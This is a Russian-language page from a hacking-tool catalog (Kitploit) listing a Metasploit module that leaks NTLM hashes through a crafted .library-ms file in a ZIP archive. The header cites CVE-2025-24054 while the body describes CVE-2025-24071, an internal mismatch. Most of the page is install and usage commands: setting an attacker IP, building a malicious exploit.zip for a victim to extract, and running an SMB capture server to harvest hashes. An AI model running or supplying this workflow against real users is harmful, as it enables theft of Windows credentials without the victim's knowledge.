Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
cve-2025-24054 — POC для CVE-2025-24054 | Kitploit
Инструменты/GitHubGitHub/fomovet/cve-2025-24054
Фреймворки для пентестаФреймворки для эксплойтовГенерация полезной нагрузкиАнализ уязвимостейЭксплуатацияКомандование и Управление
GitHubfomovet/cve-2025-24054

cve-2025-24054

POC для CVE-2025-24054

Репозиторий
22 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-24071: Утечка NTLM-хэша через файл .library-ms (модуль Metasploit)

Этот репозиторий содержит модуль Metasploit для эксплуатации уязвимости CVE-2025-24071, которая приводит к утечке NTLM-хэша при извлечении вредоносного файла .library-ms из ZIP-архива в Windows Explorer.

Разработано: FOLKS-IWD


Обзор

Уязвимость возникает, когда пользователь извлекает ZIP-архив, содержащий специально сформированный файл .library-ms. Windows Explorer автоматически инициирует запрос SMB-аутентификации к удалённому серверу, указанному в файле, что приводит к утечке NTLM-хэша пользователя без какого-либо взаимодействия с ним.

Данный модуль Metasploit:

  1. Генерирует вредоносный файл .library-ms.
  2. Упаковывает его в ZIP-архив.
  3. Интегрируется с функцией захвата SMB в Metasploit для сбора NTLM-хэшей. image

Установка

  1. Клонируйте репозиторий:
    root@kitploit:~
    git clone https://github.com/FOLKS-IWD/CVE-2025-24071-msfvenom.git
    cd CVE-2025-24071-msfvenom
    
Скачать инструмент
  • Скопируйте модуль в каталог модулей Metasploit:
    root@kitploit:~
    cp ntlm_hash_leak.rb ~/.msf4/modules/auxiliary/server/
    
  • Использование

    1. Загрузите модуль:
      root@kitploit:~
      use auxiliary/server/ntlm_hash_leak
      
    2. Установите необходимые опции:
      root@kitploit:~
      set ATTACKER_IP 192.168.1.162  # Замените на ваш IP-адрес
      set FILENAME exploit.zip       # Имя вредоносного ZIP-файла
      set LIBRARY_NAME malicious.library-ms  # Имя файла .library-ms
      set SHARE_NAME shared          # Имя общего ресурса SMB
      
    3. Запустите модуль:
      root@kitploit:~
      run
      
    4. Модуль сгенерирует вредоносный ZIP-файл (exploit.zip). Разместите этот файл так, чтобы жертва могла его скачать и извлечь.
    5. Используйте модуль захвата SMB в Metasploit для сбора NTLM-хэшей:
      root@kitploit:~
      use auxiliary/server/capture/smb
      set SRVHOST 192.168.1.162  # Должен совпадать с ATTACKER_IP
      run